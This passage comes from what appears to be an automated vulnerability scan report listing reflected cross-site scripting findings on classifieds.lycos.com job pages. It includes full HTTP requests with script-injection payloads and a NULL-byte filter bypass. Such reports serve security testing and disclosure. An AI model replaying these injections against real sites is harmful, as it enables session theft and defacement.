User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-advertising/?fde33"><script>alert(1)</script>b78103d674b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.72. http://classifieds.lycos.com/job-customer_service/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-customer_service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e44"><script>alert(1)</script>48af843abc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-customer_serviceb4e44"><script>alert(1)</script>48af843abc/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-customer_serviceb4e44"><script>alert(1)</script>48af843abc/?mobile=1" rel="nofollow">
...[SNIP]...

1.73. http://classifieds.lycos.com/job-customer_service/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-customer_service/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8344e"><script>alert(1)</script>c46db3618e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-customer_service/?8344e"><script>alert(1)</script>c46db3618e6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:40 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-customer_service/?8344e"><script>alert(1)</script>c46db3618e6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.74. http://classifieds.lycos.com/job-finance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-finance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a155a"><script>alert(1)</script>d3bf9ba5c9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-financea155a"><script>alert(1)</script>d3bf9ba5c9c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-financea155a"><script>alert(1)</script>d3bf9ba5c9c/?mobile=1" rel="nofollow">
...[SNIP]...

1.75. http://classifieds.lycos.com/job-finance/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-finance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf33"><script>alert(1)</script>ba87cf83b94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-finance/?ddf33"><script>alert(1)</script>ba87cf83b94=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-finance/?ddf33"><script>alert(1)</script>ba87cf83b94=1&mobile=1" rel="nofollow">
...[SNIP]...

1.76. http://classifieds.lycos.com/job-nonprofit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-nonprofit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bc6e"><script>alert(1)</script>b4026032be9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-nonprofit8bc6e"><script>alert(1)</script>b4026032be9/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-nonprofit8bc6e"><script>alert(1)</script>b4026032be9/?mobile=1" rel="nofollow">
...[SNIP]...

1.77. http://classifieds.lycos.com/job-nonprofit/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-nonprofit/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9fb2"><script>alert(1)</script>0ee80b17dde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-nonprofit/?a9fb2"><script>alert(1)</script>0ee80b17dde=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-nonprofit/?a9fb2"><script>alert(1)</script>0ee80b17dde=1&mobile=1" rel="nofollow">
...[SNIP]...

1.78. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-retail/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009cbe7"><script>alert(1)</script>db333101482 was submitted in the REST URL parameter 1. This input was echoed as 9cbe7"><script>alert(1)</script>db333101482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /job-retail%009cbe7"><script>alert(1)</script>db333101482/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-retail%009cbe7"><script>alert(1)</script>db333101482/?mobile=1" rel="nofollow">
...[SNIP]...

1.79. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-retail/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f5b3"><script>alert(1)</script>ea30b774ac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-retail5f5b3"><script>alert(1)</script>ea30b774ac5/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:49:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:49:59 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-retail5f5b3"><script>alert(1)</script>ea30b774ac5/?mobile=1" rel="nofollow">
...[SNIP]...

1.80. http://classifieds.lycos.com/job-retail/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-retail/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eed2"><script>alert(1)</script>2905db3b6fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-retail/?4eed2"><script>alert(1)</script>2905db3b6fd=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-retail/?4eed2"><script>alert(1)</script>2905db3b6fd=1&mobile=1" rel="nofollow">
...[SNIP]...

1.81. http://classifieds.lycos.com/job-sales/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-sales/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96fa6"><script>alert(1)</script>def49ff2313 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-sales96fa6"><script>alert(1)</script>def49ff2313/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:58 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-sales96fa6"><script>alert(1)</script>def49ff2313/?mobile=1" rel="nofollow">
...[SNIP]...

1.82. http://classifieds.lycos.com/job-sales/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c70"><script>alert(1)</script>3428ab5ad3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-sales/?17c70"><script>alert(1)</script>3428ab5ad3b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-sales/?17c70"><script>alert(1)</script>3428ab5ad3b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.83. http://classifieds.lycos.com/job-tech/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-tech/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5865d"><script>alert(1)</script>782edef86df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-tech5865d"><script>alert(1)</script>782edef86df/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-tech5865d"><script>alert(1)</script>782edef86df/?mobile=1" rel="nofollow">
...[SNIP]...

1.84. http://classifieds.lycos.com/job-tech/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-tech/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f9c"><script>alert(1)</script>4fb2b134996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-tech/?80f9c"><script>alert(1)</script>4fb2b134996=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-tech/?80f9c"><script>alert(1)</script>4fb2b134996=1&mobile=1" rel="nofollow">
...[SNIP]...

1.85. http://classifieds.lycos.com/job-work_from_home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-work_from_home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a84"><script>alert(1)</script>b01d18e6368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-work_from_home80a84"><script>alert(1)</script>b01d18e6368/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-work_from_home80a84"><script>alert(1)</script>b01d18e6368/?mobile=1" rel="nofollow">
...[SNIP]...

1.86. http://classifieds.lycos.com/job-work_from_home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-work_from_home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57054"><script>alert(1)</script>094863826eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-work_from_home/?57054"><script>alert(1)</script>094863826eb=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:43 GMT; path=/
